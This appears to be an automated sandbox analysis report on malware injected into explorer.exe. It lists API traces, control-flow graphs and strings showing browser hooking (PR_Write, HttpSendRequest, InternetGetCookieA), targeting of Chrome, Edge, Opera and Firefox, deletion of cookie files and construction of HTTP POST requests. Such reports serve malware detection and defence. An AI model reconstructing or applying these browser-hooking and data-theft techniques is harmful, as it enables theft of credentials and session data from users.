                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: b4a4eba07ad0d7409ac47feca2a9276de02681874ed0f9b4b82248323cf478b9
                        • Instruction ID: fa13855166405c0a6e647848cc380f42d6f5f21eba92606c4091c66b38f8b44b
                        • Opcode Fuzzy Hash: b4a4eba07ad0d7409ac47feca2a9276de02681874ed0f9b4b82248323cf478b9
                        • Instruction Fuzzy Hash: 64A002B15506005BDD4867B5AE1DA157528F7D4701F004944734585054996456448721

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 170 8320a7-832102 call 832415 call 8329b7 call 832938 call 8324cc 179 832104-83211b 170->179 180 83211d-832129 170->180 183 83212d-83212f 179->183 180->183 184 832403-832412 call 832999 183->184 185 832135-83216c RtlZeroMemory 183->185 189 832172-83218d 185->189 190 8323fb-832402 185->190 191 8321bf-8321d1 189->191 192 83218f-8321a0 call 83243d 189->192 190->184 197 8321d5-8321d7 191->197 198 8321b3 192->198 199 8321a2-8321b1 192->199 200 8323e8-8323ee 197->200 201 8321dd-832239 call 832866 197->201 202 8321b5-8321bd 198->202 199->202 205 8323f0-8323f2 call 832999 200->205 206 8323f7 200->206 210 8323e1 201->210 211 83223f-832244 201->211 202->197 205->206 206->190 210->200 212 832246-832257 211->212 213 83225e-83228c call 8329b7 wsprintfW 211->213 212->213 216 8322a5-8322bc 213->216 217 83228e-832290 213->217 222 8322fb-832315 216->222 223 8322be-8322f4 call 8329b7 wsprintfW 216->223 218 832291-832294 217->218 220 832296-83229b 218->220 221 83229f-8322a1 218->221 220->218 224 83229d 220->224 221->216 228 83231b-83232e 222->228 229 8323be-8323d4 call 832999 222->229 223->222 224->216 228->229 233 832334-83234a call 8329b7 228->233 237 8323d6-8323d8 call 832999 229->237 238 8323dd 229->238 239 83234c-832357 233->239 237->238 238->210 241 83236b-832382 239->241 242 832359-832366 call 83297c 239->242 246 832386-832393 241->246 247 832384 241->247 242->241 246->239 248 832395-832399 246->248 247->246 249 8323b3-8323ba call 832999 248->249 250 83239b 248->250 249->229 251 83239b call 83296b 250->251 254 8323a0-8323ad RtlMoveMemory 251->254 254->249
                        APIs
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                          • Part of subcall function 00832938: lstrlen.KERNEL32(02F5F4BE,?,00000000,00000000,008320E3,74DE8A60,02F5F4BE,00000000), ref: 00832940
                          • Part of subcall function 00832938: MultiByteToWideChar.KERNEL32(00000000,00000000,02F5F4BE,00000001,00000000,00000000), ref: 00832952
                          • Part of subcall function 008324CC: RtlZeroMemory.NTDLL(?,00000018), ref: 008324DE
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 0083213F
                        • wsprintfW.USER32 ref: 00832278
                        • wsprintfW.USER32 ref: 008322E3
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 008323AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                        • API String ID: 4204651544-1701262698
                        • Opcode ID: 73255195b98b2ea16b3dfefc1791641c1ca1fb4f20ded3fd1528a39123211da5
                        • Instruction ID: 8c93eb40aaa1033cea68178a5ad566031334b206b1cc0174ed934ef5f573f654
                        • Opcode Fuzzy Hash: 73255195b98b2ea16b3dfefc1791641c1ca1fb4f20ded3fd1528a39123211da5
                        • Instruction Fuzzy Hash: 9EA16871608744AFD714AF68DC84A2FBBE8FBC8344F00092DF986D7361DA74DA048B92

                        Control-flow Graph

                        APIs
                        • StrStrIA.SHLWAPI(?,008331D8,00000000,02F771C8), ref: 00831EE4
                        • RtlMoveMemory.NTDLL(?,?,00000000), ref: 00831F08
                        • RtlMoveMemory.NTDLL(?,?,00000100), ref: 00831F22
                        • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00831F31
                        • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00831F44
                        • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 00831F57
                        • lstrlen.KERNEL32(?,?,00000000), ref: 00831F64
                        • lstrlen.KERNEL32(?,?,?,00000000), ref: 00831F9D
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMovelstrlen
                        • String ID:
                        • API String ID: 456560858-0
                        • Opcode ID: 85d9943f712702c75fa8092785ef3eef5ed49a5132ae7ec9be953720f3160a8d
                        • Instruction ID: 86bf7ba064b1c72d422905ce18c1a0790e5e2700f713145e880036dcf7a3fe5f
                        • Opcode Fuzzy Hash: 85d9943f712702c75fa8092785ef3eef5ed49a5132ae7ec9be953720f3160a8d
                        • Instruction Fuzzy Hash: 662183725043096ADF30AA649C89EEB77DCFBD5B44F010926F940D3111EF29D94A8AE2

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00831BF4), ref: 00831E5D
                        • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00831BF4), ref: 00831E69
                        • lstrcmpiA.KERNEL32(?,02F7816C), ref: 00831E81
                        • lstrlen.KERNEL32(?,00000000), ref: 00832699
                        • RtlMoveMemory.NTDLL(02F7816C,?,00000000), ref: 008326A2
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                        • String ID:
                        • API String ID: 2826435453-0
                        • Opcode ID: 28ac383cb299b69ec5c5675acbb156e0bcad83480244d2cb67e814b5c87bef33
                        • Instruction ID: c793d2dd282d4f2df4eb2198cf5e8d73c4c339f7bf22776747475bf4cf4a4fe8
                        • Opcode Fuzzy Hash: 28ac383cb299b69ec5c5675acbb156e0bcad83480244d2cb67e814b5c87bef33
                        • Instruction Fuzzy Hash: 2C21F6B26006105FDB109F68EC889BA779DFFC9711F10042AEC05C7241D772990687E2

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00831BF4), ref: 00831E5D
                        • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00831BF4), ref: 00831E69
                        • lstrcmpiA.KERNEL32(?,02F7816C), ref: 00831E81
                        • lstrlen.KERNEL32(?,00000000), ref: 00832699
                        • RtlMoveMemory.NTDLL(02F7816C,?,00000000), ref: 008326A2
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                        • String ID:
                        • API String ID: 2826435453-0
                        • Opcode ID: 17c5b9e922fd7f286888d082a4673bd4c0f9ea1ade115ad6b49d7d80ec031081
                        • Instruction ID: 67724ec3961c81c6b1c42743550204609e9de753a91f281b355fe2257a3d6541
                        • Opcode Fuzzy Hash: 17c5b9e922fd7f286888d082a4673bd4c0f9ea1ade115ad6b49d7d80ec031081
                        • Instruction Fuzzy Hash: F221F3B2A00610AFDB10DF68EC889AA77EDFFCA710F000869EC45D7241D772990687E2

                        Control-flow Graph

                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0083190C
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0083191C
                        • CloseHandle.KERNEL32(00000000), ref: 00831966
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00831941
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                        • String ID:
                        • API String ID: 2517252058-0
                        • Opcode ID: 95c450d297543539e2fdb251745f64bffe2e19ddd61c9b29b87c6c8b6490f919
                        • Instruction ID: f38331dcfc257c43e461972cfd22c21d6a4f1924d4514b617e387de7c23f12b2
                        • Opcode Fuzzy Hash: 95c450d297543539e2fdb251745f64bffe2e19ddd61c9b29b87c6c8b6490f919
                        • Instruction Fuzzy Hash: 5E01F73230021467D6212A299CACF6F7D5DFBC6BB0F000A29F956E21D0DA245D0541B0

                        Execution Graph

                        Execution Coverage:14.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:224
                        Total number of Limit Nodes:16

                        Callgraph


                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00383886
                        • GetCurrentProcessId.KERNEL32(00000001), ref: 0038389B
                        • wsprintfA.USER32 ref: 003838B6
                          • Part of subcall function 0038118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 003811A9
                          • Part of subcall function 0038118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 003811C1
                          • Part of subcall function 0038118D: lstrlen.KERNEL32(?,00000000), ref: 003811C9
                          • Part of subcall function 0038118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 003811D4
                          • Part of subcall function 0038118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 003811EE
                          • Part of subcall function 0038118D: wsprintfA.USER32 ref: 00381205
                          • Part of subcall function 0038118D: CryptDestroyHash.ADVAPI32(?), ref: 0038121E
                          • Part of subcall function 0038118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00381228
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 003838CD
                        • GetLastError.KERNEL32 ref: 003838D3
                        • RtlInitializeCriticalSection.NTDLL(00386038), ref: 003838F3
                        • PathFindFileNameA.SHLWAPI(?), ref: 003838FA
                        • lstrcat.KERNEL32(00385CDE,00000000), ref: 00383910
                        • Sleep.KERNEL32(000001F4), ref: 0038392A
                        • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0038393C
                        • GetCommandLineW.KERNEL32(?), ref: 0038394F
                        • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0038397E
                        • GetProcAddress.KERNEL32(00000000), ref: 00383987
                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 003839AF
                        • GetProcAddress.KERNEL32(00000000), ref: 003839B2
                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 003839C4
                        • GetProcAddress.KERNEL32(00000000), ref: 003839C7
                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 003839E1
                        • GetProcAddress.KERNEL32(00000000), ref: 003839E4
                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 003839EC
                        • GetProcAddress.KERNEL32(00000000), ref: 003839EF
                        • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 00383A6D
                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00383A78
                        • StrStrIA.SHLWAPI(00000000), ref: 00383A7B
                        • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 00383A8E
                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00383A9D
                        • StrStrIA.SHLWAPI(00000000), ref: 00383AA0
                        • GetModuleHandleA.KERNEL32(opera.dll), ref: 00383ABF
                        • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00383ACC
                        • CommandLineToArgvW.SHELL32(00000000), ref: 00383956
                          • Part of subcall function 003816C7: GetCurrentProcessId.KERNEL32 ref: 003816D9
                          • Part of subcall function 003816C7: GetCurrentThreadId.KERNEL32 ref: 003816E1
                          • Part of subcall function 003816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003816F1
                          • Part of subcall function 003816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 003816FF
                          • Part of subcall function 003816C7: CloseHandle.KERNEL32(00000000), ref: 00381758
                        • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 00383A10
                        • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 00383A20
                        • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 00383A30
                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00383A47
                        • StrStrIA.SHLWAPI(00000000), ref: 00383A4A
                        • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00383A5F
                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00383B2C
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B35
                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00383B52
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B55
                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00383B72
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B75
                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00383B99
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B9C
                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00383BA9
                        • GetProcAddress.KERNEL32(00000000), ref: 00383BAC
                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00383BB9
                        • GetProcAddress.KERNEL32(00000000), ref: 00383BBC
                          • Part of subcall function 00381C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00381C42
                        • RtlExitUserThread.NTDLL(00000000), ref: 00383BD9
                        • wsprintfA.USER32 ref: 00383C1F
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00383C69
                        • Process32First.KERNEL32(00000000,?), ref: 00383C88
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00383D77
                        • Sleep.KERNELBASE(000003E8), ref: 00383D82
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: HandleModule$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFindFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvChangeCriticalDataDestroyErrorExitInitializeLastMemoryMoveMutexNotificationParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                        • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                        • API String ID: 2739256675-2618538661
                        • Opcode ID: e3c019fae88fa06b646be0774629389ab5a8ef9ad991e8f177a6133951da0b9d
                        • Instruction ID: 71fbb07791ef1b64a45fb3c035b08d81c53850a101bb40457932b15d8079d23c
                        • Opcode Fuzzy Hash: e3c019fae88fa06b646be0774629389ab5a8ef9ad991e8f177a6133951da0b9d
                        • Instruction Fuzzy Hash: E0A1E1F1A44316ABC71377719C0AE6F7A9C9F40B41F1205E4F901EB691EB79CE028BA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 003815EB
                        • FindFirstFileW.KERNELBASE(00000000,?), ref: 003815F7
                        • lstrcmpiW.KERNEL32(?,003841C8), ref: 00381623
                        • lstrcmpiW.KERNEL32(?,003841CC), ref: 00381633
                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0038164C
                        • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00381661
                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0038167E
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0038169C
                        • FindClose.KERNELBASE(00000000), ref: 003816AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                        • String ID: *.*$Cookies*
                        • API String ID: 4256701249-3228320225
                        • Opcode ID: 88a7450bd3dfc78d77b4960b903adaf12b34a87ac3f620225f67d04eb0e85639
                        • Instruction ID: 7ac236003d88c8868c4a6ddd4bf537e9455a16956707f3257617ab48222bf0dd
                        • Opcode Fuzzy Hash: 88a7450bd3dfc78d77b4960b903adaf12b34a87ac3f620225f67d04eb0e85639
                        • Instruction Fuzzy Hash: 2D2196712043165BD312BB70AC49A7F77ACEB89781F0505A9F981D7241EB34CD4647A2

                        Control-flow Graph

                        APIs
                          • Part of subcall function 003813FE: wsprintfW.USER32 ref: 0038142A
                          • Part of subcall function 003813FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00381439
                          • Part of subcall function 003813FE: wsprintfW.USER32 ref: 00381476
                          • Part of subcall function 003813FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 0038149C
                          • Part of subcall function 003813FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003814AF
                          • Part of subcall function 003813FE: FindClose.KERNELBASE(00000000), ref: 003814BA
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • wsprintfW.USER32 ref: 0038150D
                        • FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                        • wsprintfW.USER32 ref: 00381557
                        • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                        • DeleteFileW.KERNELBASE(00000000), ref: 00381571
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                        • FindClose.KERNELBASE(00000000), ref: 0038158F
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                        • String ID: %s%s$*.*
                        • API String ID: 2055899612-705776850
                        • Opcode ID: 3d54ae96db4e307e562a1e2feed1cbc6f444014d1cad67ca451cb7c885c64e6b
                        • Instruction ID: 47c8d518e8941c5f52ae53d874b02aa6715c3eef1477473e1a8878b85bbc103c
                        • Opcode Fuzzy Hash: 3d54ae96db4e307e562a1e2feed1cbc6f444014d1cad67ca451cb7c885c64e6b
                        • Instruction Fuzzy Hash: 1B1129712003055BD313BB349C4DE6F7B9CEFD6755F000598FE4286192EB74898683A6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 246 3813fe-381444 call 381000 wsprintfW FindFirstFileW 249 3814c4-3814d5 call 381011 246->249 250 381446 246->250 252 38144a-38144f 250->252 254 3814a9-3814b7 FindNextFileW 252->254 255 381451-38145c call 3813d7 252->255 254->252 256 3814b9-3814c0 FindClose 254->256 255->254 259 38145e-381499 call 381000 wsprintfW call 3814d8 255->259 256->249 264 38149b-38149c RemoveDirectoryW 259->264 265 3814a2-3814a4 call 381011 259->265 264->265 265->254
                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • wsprintfW.USER32 ref: 0038142A
                        • FindFirstFileW.KERNELBASE(00000000,?), ref: 00381439
                        • wsprintfW.USER32 ref: 00381476
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 0038150D
                          • Part of subcall function 003814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 00381557
                          • Part of subcall function 003814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                          • Part of subcall function 003814D8: DeleteFileW.KERNELBASE(00000000), ref: 00381571
                          • Part of subcall function 003814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                          • Part of subcall function 003814D8: FindClose.KERNELBASE(00000000), ref: 0038158F
                        • RemoveDirectoryW.KERNELBASE(00000000), ref: 0038149C
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003814AF
                        • FindClose.KERNELBASE(00000000), ref: 003814BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                        • String ID: %s%s$%s%s\$*.*
                        • API String ID: 2055899612-4093207852
                        • Opcode ID: b9f33b8079d0dbb338ea9229cae9110476bbe98759e67ce792b401d45d45f9ea
                        • Instruction ID: 6e6d0c5981dbf50cc1e877358dd506f90d3878e976631ce2b9117bc3784d4835
                        • Opcode Fuzzy Hash: b9f33b8079d0dbb338ea9229cae9110476bbe98759e67ce792b401d45d45f9ea
                        • Instruction Fuzzy Hash: 411106702043415BD312BB25DC49ABFB7ECEFD5301F1105ACFA4193192EB754C4A8762

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 288 383d8d-383d97 call 381274 291 383d99-383dc2 call 381000 RtlMoveMemory 288->291 292 383e03-383e04 288->292 295 383de8-383dfc NtUnmapViewOfSection 291->295 296 383dc4-383de2 call 381000 RtlMoveMemory 291->296 298 383e0a-383e15 call 383be1 295->298 299 383dfe-383dff 295->299 296->295 305 383e20-383e23 298->305 306 383e17-383e1b call 383d8d 298->306 299->292 301 383e01-383e05 call 383862 299->301 301->298 306->305
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00383DAF
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00383DE2
                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00383DEB
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                        • String ID:
                        • API String ID: 4050682147-0
                        • Opcode ID: c9da5e0b26e41bc5a6e485e956726fe80ab72b35903608830fe7235e442c5b36
                        • Instruction ID: 5e00558b542de689d947fc64fea0eecdd76035c0c5b96793fb0345e15d74969c
                        • Opcode Fuzzy Hash: c9da5e0b26e41bc5a6e485e956726fe80ab72b35903608830fe7235e442c5b36
                        • Instruction Fuzzy Hash: B501D4B1408301AFCB2BBB64EC59BA77B6CEB40711F1189D9B4158B3A1CA369B41CB65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 312 382ea8-382ebc StrStrIA 313 382ecd-382ed1 312->313 314 382ebe-382eca call 382e1b 312->314 314->313
                        APIs
                        • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,00383CD2), ref: 00382EB4
                          • Part of subcall function 00382E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00382EC5), ref: 00382E27
                          • Part of subcall function 00382E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00382E52
                          • Part of subcall function 00382E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00382E7F
                          • Part of subcall function 00382E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00382E92
                        Strings
                        • chrome.exe|opera.exe|msedge.exe, xrefs: 00382EAB
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process$InformationQuery$Open
                        • String ID: chrome.exe|opera.exe|msedge.exe
                        • API String ID: 4117927671-3743313796
                        • Opcode ID: 0bcf129d6579d3653d1a83a9c25fb2b28483a1501c1bf0ee781f5627adc96094
                        • Instruction ID: 47f75e2a9d687c196196debc509ce4a953d2d33716aaae65c25be26faf0df4ac
                        • Opcode Fuzzy Hash: 0bcf129d6579d3653d1a83a9c25fb2b28483a1501c1bf0ee781f5627adc96094
                        • Instruction Fuzzy Hash: 1DD0C93231472217572E767A6C1A96F958DCBC6A6230641BEE942D7650EA909C4343A4

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                          • Part of subcall function 00381363: Process32First.KERNEL32(00000000,?), ref: 00381393
                          • Part of subcall function 00381363: FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                          • Part of subcall function 00381363: lstrcmpiA.KERNEL32(?), ref: 003813A3
                          • Part of subcall function 00381363: Process32Next.KERNEL32(00000000,00000128), ref: 003813C0
                        • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 00383731
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 00383752
                        • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00383764
                          • Part of subcall function 003815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 003815EB
                          • Part of subcall function 003815BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 003815F7
                          • Part of subcall function 003815BE: lstrcmpiW.KERNEL32(?,003841C8), ref: 00381623
                          • Part of subcall function 003815BE: lstrcmpiW.KERNEL32(?,003841CC), ref: 00381633
                          • Part of subcall function 003815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0038164C
                          • Part of subcall function 003815BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0038169C
                          • Part of subcall function 003815BE: FindClose.KERNELBASE(00000000), ref: 003816AB
                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0038377A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 00383783
                        • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0038378F
                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 003837A3
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 003837AC
                        • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 003837B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Path$Find$FolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateChangeCreateNotificationProcessSleepSnapshotToolhelp32
